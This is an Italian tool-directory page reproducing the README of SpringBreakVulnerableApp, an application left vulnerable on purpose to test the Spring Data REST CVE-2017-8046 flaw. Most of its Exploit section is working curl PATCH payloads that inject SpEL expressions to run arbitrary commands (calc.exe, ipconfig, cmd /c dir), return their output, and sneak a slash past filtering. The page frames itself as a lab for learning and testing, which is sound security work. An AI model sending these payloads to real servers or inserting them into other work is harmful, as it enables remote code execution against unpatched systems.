Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
SpringBreakVulnerableApp — ATTENZIONE: Questa è un'applicazione vulnerabile per testare l'exploit della vulnerabilità Spring Break (CVE-2017-8046). Eseguila a tuo rischio e pericolo! | Kitploit
Strumenti/GitHubGitHub/m3ssap0/springbreakvulnerableapp
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubm3ssap0/springbreakvulnerableapp

SpringBreakVulnerableApp

ATTENZIONE: Questa è un'applicazione vulnerabile per testare l'exploit della vulnerabilità Spring Break (CVE-2017-8046). Eseguila a tuo rischio e pericolo!

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
14107 anni faNon ancora revisionato

Applicazione vulnerabile Spring Break

Questa è un'applicazione vulnerabile per testare l'exploit della vulnerabilità Spring Break (CVE-2017-8046).

ATTENZIONE!

Questa applicazione contiene gravi vulnerabilità di sicurezza. Eseguila a tuo rischio! Si consiglia di utilizzare un ambiente isolato e con backup (come una VM con uno snapshot recente e rete host-only). Non caricare questa applicazione su server esposti a Internet, poiché verranno compromessi.

DICHIARAZIONE DI NON RESPONSABILITÀ: non mi assumo la responsabilità per l'uso che chiunque fa di questa applicazione (SpringBreakVulnerableApp). L'unico scopo di questa applicazione è essere uno scenario di test per l'exploit di Spring Break e non dovrebbe essere usata in modo malevolo. Se il tuo server viene compromesso tramite un'installazione di SpringBreakVulnerableApp, non è mia responsabilità, ma è responsabilità della/e persona/e che l'hanno caricata e installata.

Informazioni sulla vulnerabilità

  • CVE-ID: CVE-2017-8046
  • Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
  • Descrizione: richieste PATCH maligne inviate a server spring-data-rest nelle versioni Pivotal Spring Data REST precedenti alla 2.5.12, 2.6.7, 3.0 RC3, versioni Spring Boot precedenti alla 2.0.0M4 e release train di Spring Data precedenti alla Kay-RC3 possono utilizzare dati JSON appositamente predisposti per eseguire codice Java arbitrario.

Utilizzo

L'applicazione può essere avviata con il seguente comando Maven.

root@kitploit:~
mvn spring-boot:run

Un fat jar può essere generato con il seguente comando Maven.

root@kitploit:~
mvn clean install spring-boot:repackage

Per inserire dati puoi usare il seguente comando curl.

root@kitploit:~
curl -i -X POST -H "Content-Type: application/json" -d '{ "name" : "Test", "attribute" : "foo"}' http://hostname:port/entity

Exploit

Probabilmente l'exploit più semplice è la seguente richiesta.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Thread).sleep(10000).x", "value" : "pwned" }]' "http://hostname:port/entity/1"

Su Windows, il processo calc.exe può essere avviato con la seguente richiesta. Richieste simili possono essere usate per eseguire comandi arbitrari.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Runtime).getRuntime().exec(\"calc.exe\").x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

Per ottenere l'output dei comandi eseguiti, si possono usare alcuni "gadget" offerti dal codice di Spring Framework. Fortunatamente, non sono richieste dipendenze esterne. Per esempio, il risultato del comando ipconfig può essere recuperato con la seguente richiesta.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ipconfig\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

Su Windows, un comando cmd /c dir, e altri comandi simili, possono essere eseguiti con la seguente richiesta. Si noti il trucco usato per inserire il carattere slash evitando il valore esplicito (cioè gli slash espliciti vengono sostituiti con punti prima del parsing reale).

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"cmd \" + T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F)) + \"c dir\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

Un programma Java per sfruttare questa vulnerabilità può essere trovato qui.

Autori

  • Antonio Francesco Sardella - implementazione - m3ssap0

Licenza

Questo progetto è concesso in licenza sotto la MIT License - consulta il file LICENSE.txt per i dettagli.

Riconoscimenti

  • Man Yue Mo il ricercatore di sicurezza che ha scoperto la vulnerabilità
Scarica lo strumento